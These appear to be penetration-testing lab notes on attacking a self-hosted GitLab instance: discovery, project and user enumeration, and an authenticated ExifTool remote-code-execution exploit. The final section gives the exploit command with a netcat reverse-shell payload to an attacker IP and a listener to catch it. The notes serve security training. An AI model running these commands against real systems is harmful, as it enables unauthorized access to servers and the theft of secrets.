Web-based Git-repository hosting tool that provides wiki capabilities, issue tracking, and continuous integration and deployment pipeline functionality.

It is common to come across interesting data in a company’s Github repo, self-hosted GitLab or Bitbucket isntance. They hold publicly available code such as scripts to interact with an API. They may contain cleartext secrets such as passwords.

Discovery

By browsing to the GitLab URL we can quickly identify it via the logo.

To footprint the version number we must be logged in and visit the /help page. We may be able to simply register an account if the instance allows.

Enumeration

Visiting the /explore to see if there are an public projects that may contain sensitive information.

Visiting the groups, snippets, and help pages can allows us to uncover additional projects.

If the organization allows non-company email to register an account we can try and find additional projects.

Attacking

User enumeration is possible on GitLab. In version below 16.6 GitLab defaults are set to 10 failed login attempts, resulting in a GitLab automatic unlock after 10 minutes. Versions after 16.6 administrators can configure this via the admin UI with max_login_attempts and failed_login_attempts_unlock_period_in_minutes.

A simple script can help automate user enumeration

/gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

GitLab community edition 13.10.2 and lower suffered from an authenticated RCE exploit due to an issue with ExifTool handling metadata in uploaded images files. We do need a valid username and password.

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '
 
# catch the shell
nc -lnvp 8443